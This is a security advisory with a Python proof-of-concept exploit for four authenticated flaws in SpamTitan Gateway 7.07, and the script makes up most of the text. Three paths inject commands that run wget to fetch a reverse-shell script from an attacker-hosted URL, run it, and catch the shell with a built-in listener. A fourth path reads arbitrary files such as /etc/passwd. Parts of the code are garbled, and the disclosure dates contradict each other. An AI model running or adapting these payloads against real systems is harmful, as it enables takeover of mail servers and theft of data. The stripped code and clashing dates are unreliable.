SpamTitan 7.07 Remote Code Execution

Credit: Felipe Molina
Risk: High
Local: No
Remote: Yes

# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated) # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: # Software Link: # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 ---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Multiple Authenticated Remote Code Execution CVSSv3: 8.7 ( Severity: High Release Date: 2020-09-18 CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 I. Background ~~~~~~~~~~~~ From "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~ Multiple authenticated remote code execution (RCE) vulnerabilities were found on the SpamTitan Gateway 7.07 and probably in pervious versions: * CVE-2020-11699: Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. * CVE-2020-11700: Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. * CVE-2020-11803: Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. * CVE-2020-11804: Due to improper sanitization of the parameter qid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. III. PoC ~~~~~~~ Use python 3 and install the following modules before executing: requests. If your IP is and the target SpamTitan server is, call the PoC like this: ./ -t -i -m <EXPLOIT NUMBER> -u <USER> -p <PASSWORD> -U --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read # 0days on SpamTitan 7.07 and previous versions. # Product URL: # Product Version: 7.07 and probably previous import requests from requests import Timeout requests.packages.urllib3.disable_warnings() import os import threading from optparse import OptionParser import socket import json import re from urllib.parse import urlparse from time import sleep from base64 import b64decode,b64encode def myip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('', 1)) IP = s.getsockname()[0] except: IP = '' finally: s.close() return IP def shellServer(ip,port,quiet): servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servers.bind((ip, port)) servers.listen(1) info("Waiting for incoming connection on %s:%s" % (ip,port)) conn, addr = servers.accept() conn.settimeout(1) success("Hurray, we got a connection from %s" % addr[0]) prompt =conn.recv(128) prompt=str(prompt.decode("utf-8")).strip() command = input(prompt) while True: try: c = "%s\n" % (command) if (len(c)>0): conn.sendall(c.encode("utf-8")) # Quit the console if command == 'exit': info("\nClosing connection") conn.close() break else: completeanswer="" while True: answer=None try: answer=str((conn.recv(1024)).decode("utf-8")) completeanswer+=answer except socket.timeout: completeanswer.strip() break print(completeanswer,end='') command = input("") except (KeyboardInterrupt, EOFError): info("\nClosing connection") break # This is an authenticated remote code execution in "certs-x.php". E.g: def CVE_2020_11699(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/;/usr/local/bin/python /tmp/" % (shellurl) t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m ="var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"deletecert", "fname":"dummy || $(%s)" % oscmd } info("Triggering the reverse shell in the target.") try: res2 =,data=data,cookies=cookies,verify=False) print(res2.text) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an arbitrary file read on "certs-x.php" def CVE_2020_11700(cookies,target,file): fullpath="../../../..%s" % file t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m ="var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"downloadkey", "fname":fullpath, "commonname":"", "organization":"", "organizationunit":"", "city":"", "state":"", "country":"", "csrout":"", "pkout":"", "importcert":"", "importkey":"", "importchain":"" } res2 =,data=data,cookies=cookies,verify=False) if (res2.status_code == 200): success("Contents of the file %s" % file) print(res2.text) else: fail("Error obtaining the CSRF guard tokens from the page.") return False # This is an authenticated RCE abusing PHP eval function in mailqueue.php def CVE_2020_11803(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/;/usr/local/bin/python /tmp/" % (shellurl) b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8") payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\"" % (b64) t1 = "%s/certs.php" % target t2 = "%s/mailqueue.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m ="var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":payload, "activepage":"incoming", "incoming_count":"0", "active_count":"0", "deferred_count":"0", "hold_count":"0", "corrupt_count":"0", "incoming_page":"1", "active_page":"1", "deferred_page":"1", "hold_page":"1", "corrupt_page":"1", "incomingrfilter":None, "incomingfilter":None, "incoming_option":"hold", "activerfilter":None, "activefilter":None, "active_option":"hold", "deferredrfilter":None, "deferredfilter":None, "deferred_option":"hold", "holdrfilter":None, "holdfilter":None, "hold_option":"release", "corruptrfilter":None, "corruptfilter":None, "corrupt_option":"delete" } # We have to pass a string instead of a dict if we don't want the requests library to convert it to # an urlencoded data and break our payload datastr="" cont=0 for k,v in data.items(): datastr+="%s=%s" % (k,v) cont+=1 if (cont<len(data)): datastr+="&" headers={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Content-Type": "application/x-www-form-urlencoded" } try: res2 =,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an authenticated RCE abusing qid GET parameter in mailqueue.php def CVE_2020_11804(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/;/usr/local/bin/python /tmp/" % (shellurl) payload="1;`%s`" % oscmd t = "%s/mailqueue.php?qid=%s" % (target,payload) info("Triggering the reverse shell in the target.") try: res2 = requests.get(t,cookies=cookies,verify=False) except Timeout: info("Request timed-out. You should have received already your reverse shell.") # Authenticate to the web platform and get the cookies def authenticate(target,user,password): loginurl="%s/login.php" % target data={ "jaction":"none", "language":"en_US", "address":"%s" % user, "passwd":"%s" % password } res =, data=data,allow_redirects = False,verify=False) if (res.status_code == 302 and len(res.cookies.items())>0): return res.cookies else: return None def printmsg(msg,quiet=False,msgtype="i"): if (not quiet): if (success): print("[%s] %s" % (msgtype,msg)) else: print("[-] %s" % msg) def info(msg,quiet=False): printmsg(msg,quiet,msgtype="i") def success(msg,quiet=False): printmsg(msg,quiet,msgtype="+") def fail(msg,quiet=False): printmsg(msg,quiet,msgtype="-") def parseoptions(): parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.:", default=None) parser.add_option("-m", "--method", dest="method", help="Exploit number: (1) CVE-2020-11699 [RCE], (2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700 [File Read]", default=1) parser.add_option("-u", "--user", dest="user", help="Username to authenticate with. Default: admin", default="admin") parser.add_option("-p", "--password", dest="password", help="Password to authenticate with. Default: hiadmin", default="hiadmin") parser.add_option("-I", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip()) parser.add_option("-P", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242) parser.add_option("-U", "--URL", dest="shellurl", help="HTTP URL path where the reverse shell is located. Default: http://%s/" % myip(), default="http://%s/" % myip()) parser.add_option("-f", "--filetoread", dest="filtetoread", help="Full path of the file to read from the remote server when executing CVE-2020-11700. Default: /etc/passwd", default="/etc/passwd") parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.") return parser.parse_args() def main(): (options,arguments) = parseoptions() quiet = options.quiet target = ip = options.ip port = options.port user = options.user password = options.password shellurl = options.shellurl method = int(options.method) rfile = options.filtetoread # Sanitize options if (target is None): fail("Error. Specify a target (-t).") exit(1) else: if (not target.startswith("http://") and not target.startswith("https://")): target = "http://%s" % target if (method < 1 or method > 4): fail("Error. Specify a method from 1 to 4:\n (1) CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2 [RCE]\n (4) CVE-2020-11700 [File Read]") exit(1) # Before doing anything, login cookies = authenticate(target,user,password) if (cookies is not None): success("User logged in successfully.") if (method == 1): info("Exploiting CVE-2020-11699 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11699, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 2): info("Exploiting CVE-2020-11803 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11803, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 3): info("Exploiting CVE-2020-11804 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11804, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 4): info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet) CVE_2020_11700(cookies,target,rfile) else: fail("Error authenticating. Are you providing valid credentials?") exit(2) exit(0) main() --------------------------------------------- III. Impact ~~~~~~~~~~ Loss of confidentiality, integrity and availability of several files in the target server, as well as loss of availability of several services running in the SpamTitan. Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db would be highly impacted. IV. Disclosure ~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre Vendor Informed: 2020-04-17 Patch Release Date: 2019-05-26 Advisory Release Date: 2019-09-18 V. References ~~~~~~~~~~~~ * * * * * ---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]---

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